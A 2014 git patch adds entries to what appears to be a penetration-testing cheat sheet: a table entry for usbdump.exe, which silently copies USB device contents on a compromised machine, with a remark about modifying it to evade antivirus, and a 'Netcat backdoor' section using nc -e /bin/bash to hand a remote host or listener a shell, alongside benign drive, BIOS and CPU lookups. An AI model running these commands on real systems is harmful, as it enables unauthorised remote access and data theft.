From f5ee21e1e272b387c49e70818d7d5f28f7c6a87e Mon Sep 17 00:00:00 2001 From: tekwizz123 Date: Tue, 28 Jan 2014 19:21:26 +0000 Subject: [PATCH] Initial port of commands over from Google Docs --- bins/windows/index.md | 7 ++++++ scripting/bash.md | 23 +++++++++++++++++-- scripting/powershell.md | 49 ++++++++++++++++++++++++++++++++++++++++- 3 files changed, 76 insertions(+), 3 deletions(-) create mode 100644 bins/windows/index.md diff --git a/bins/windows/index.md b/bins/windows/index.md new file mode 100644 index 0000000..964b81a --- /dev/null +++ b/bins/windows/index.md @@ -0,0 +1,7 @@ +# Useful Windows Binaries + +Useful Windows binary tools that can be used for post exploitation. + +| Tool | Description / Importance | Contributer | +| ----------- | ------------------------ | ----------- | +| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | diff --git a/scripting/bash.md b/scripting/bash.md index 37dd3f3..abf1347 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' tcpdump -w - | nc -v 8.8.8.8 9999 ``` -**Recursively search for files within a directory** +**Recursively search for text contained in files within a directory** ```bash zcat -rf ./* | grep "searchstring" ``` +**Recursively search for files with the specified word within them** +*Submitted by cat on Google Fourms* +```bash +ls -a | find | grep -i "string" +``` + +**Netcat backdoor** +*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)* +```bash +nc -e /bin/bash *remotecomputer* *port* +OR +nc -e /bin/bash -lp *port* +``` + +**View CPU Information** +```bash +cat /proc/cpuinfo +``` + Credits ----------- -Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions) diff --git a/scripting/powershell.md b/scripting/powershell.md index 94bb7a7..9b655c0 100644 --- a/scripting/powershell.md +++ b/scripting/powershell.md @@ -83,4 +83,51 @@ tingSystem=*Server*))" |select name` * **Output**: *
**Windows 7:** Show/Hide
name
----
PWNT-DC
Exchange1
-SharePoint1
\ No newline at end of file +SharePoint1 + + ### Get Info About All Connected Drives + * **Command with arguments**: `[System.IO.DriveInfo]::GetDrives()` + * **Output**: + *
**Windows 7:** Show/Hide
+ Name : C:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : C:\ + VolumeLabel : HP +
+ Name : D:\ + DriveType : Fixed + DriveFormat : NTFS + IsReady : True + AvailableFreeSpace : 111111111111 + TotalFreeSpace : 111111111111 + TotalSize : 111111111111 + RootDirectory : D:\ + VolumeLabel : DATA +
+ Name : E:\ + DriveType : CDRom + DriveFormat : + IsReady : False + AvailableFreeSpace : + TotalFreeSpace : + TotalSize : + RootDirectory : E:\ + VolumeLabel : +
+ + ### Retrieve BIOS Information (including system serial number) + * **Command with arguments**: `gwmi win32_bios` + * **Output**: + *
**Windows 7:** Show/Hide
+ SMBIOSBIOSVersion : 6.0 + Manufacturer : Phoenix Technologies LTD + Name : PheonixBIOS 4.0 Release 6.0 + SerialNumber : XXXXXXXXXXXXXXXXXXXXXX + Version : XXXXXX - XXXXXXX +
+